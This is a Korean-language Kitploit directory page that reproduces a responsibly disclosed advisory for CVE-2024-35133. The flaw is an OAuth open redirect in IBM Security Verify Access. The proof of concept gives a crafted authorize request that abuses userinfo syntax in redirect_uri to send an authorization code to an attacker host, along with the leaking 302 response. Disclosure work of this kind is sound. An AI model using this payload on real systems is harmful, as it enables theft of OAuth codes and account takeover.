Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133 — # CVE-2024-35133 보안 권고 - PoC 포함 | Kitploit
도구/GitHubGitHub/ozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

# CVE-2024-35133 보안 권고 - PoC 포함

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
21년 전아직 검토되지 않음

IBM Security Verify Access - OAuth 흐름 중 오픈 리다이렉트 (CVE-2024-35133)

목차

  1. 개요
  2. 상세 설명
  3. 개념 증명
  4. 해결 방안
  5. 공개 타임라인
  6. 참조
  7. 크레딧
  8. 법적 고지

개요

개정 버전: 1.0
영향:
원격 공격자는 피해자를 특수하게 제작된 웹사이트를 방문하도록 유도함으로써 이 취약점을 악용하여 표시되는 URL을 스푸핑하고 사용자를 악성 웹사이트로 리다이렉트할 수 있습니다. 이를 통해 공격자는 매우 민감한 정보를 획득하거나 피해자에 대한 추가 공격을 수행할 수 있습니다.

심각도:

  • NIST: 높음
  • IBM: 중간

CVSS 점수:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

공급업체: IBM

영향을 받는 제품:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

영향을 받는 버전: 10.0.0 - 10.0.8

제품 설명

IBM Security Verify Access는 완전한 권한 부여 및 네트워크 보안 정책 관리 솔루션입니다. 지리적으로 분산된 인트라넷과 엑스트라넷 전반에 걸쳐 리소스에 대한 종단 간 보호를 제공합니다.

주요 기능은 다음과 같습니다:

  • 인증(Authentication): 다양한 기본 제공 인증기와 외부 인증기 지원.
  • 권한 부여(Authorization): 보호된 리소스 요청에 대한 안전한 허용 및 거부 결정.
  • 데이터 보안 및 중앙 집중식 리소스 관리: 기업 방화벽 시스템을 통해 공용 인터넷 연결을 사용하여 내부 네트워크 기반 리소스에 대한 안전한 액세스를 관리합니다.

상세 설명

고객사를 대상으로 한 OAuth 흐름 침투 테스트 중 OAuth "code" 변수의 유출을 허용하는 오픈 리다이렉트 취약점이 발견되었습니다.

공격자는 OAuth 흐름 중 "redirect_uri" 매개변수 검증을 담당하는 파서의 로직을 우회하여(RFC 3986 활용) IBM Security Verify Access의 도메인 허용 목록 필터를 조작할 수 있었습니다. 그 결과 공격자가 제어하는 임의의 도메인으로의 오픈 리다이렉트가 발생했습니다. 피해자는 도메인이 신뢰할 수 있는 것처럼 보이는 동안 악성 사이트로 리다이렉트될 수 있습니다.

이는 OAuth "code" 토큰과 같은 민감한 정보의 노출이나 피해자에 대한 추가 공격으로 이어질 수 있습니다.


개념 증명

요청

root@kitploit:~
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

응답

root@kitploit:~
HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

해결 방안

패치, 업그레이드 또는 권장 해결 방법에 대한 정보는 IBM 보안 게시판 7166712를 참조하십시오.
자세한 내용은 참조를 확인하십시오.


공개 타임라인

  • 2024년 3월 19일: 보안 연구원(Giulio Garzia)이 취약점 발견
  • 2024년 3월 21일: IBM Security Verify Access를 사용하는 고객사에 취약점 공유
  • 2024년 4월 2일: IBM에 취약점 보고
  • 2024년 5월 14일: IBM이 취약점 확인
  • 2024년 7월 18일: IBM이 고객에게 사전 릴리스 패치 제공
  • 2024년 8월 27일: IBM이 보안 게시판 및 취약점 공개

참조

  1. IBM 보안 게시판 CVE-2024-35133
  2. IBM X-Force 취약점 데이터베이스
  3. NIST CVE-2024-35133
  4. CWE-178: URL의 부적절한 처리

크레딧

이 취약점은 다음에 의해 발견 및 보고되었습니다:

  • Giulio Garzia
    LinkedIn
    GitHub

법적 고지

Copyright (c) 2024 Giulio Garzia "Ozozuz"

본 경고의 전자적 재배포는 허용됩니다. 명시적인 서면 동의 없이는 편집할 수 없습니다. 다른 매체에 본 경고를 재인쇄하려면 작성자에게 문의하십시오.

고지사항: 본 권고의 정보는 게시 시점에 사용 가능한 데이터를 기준으로 정확합니다. 어떠한 보증도 제공되지 않습니다. 작성자와 발행인은 본 정보의 사용으로 인해 발생하는 직접적, 간접적 또는 결과적 손해에 대해 책임을 지지 않습니다.

도구 다운로드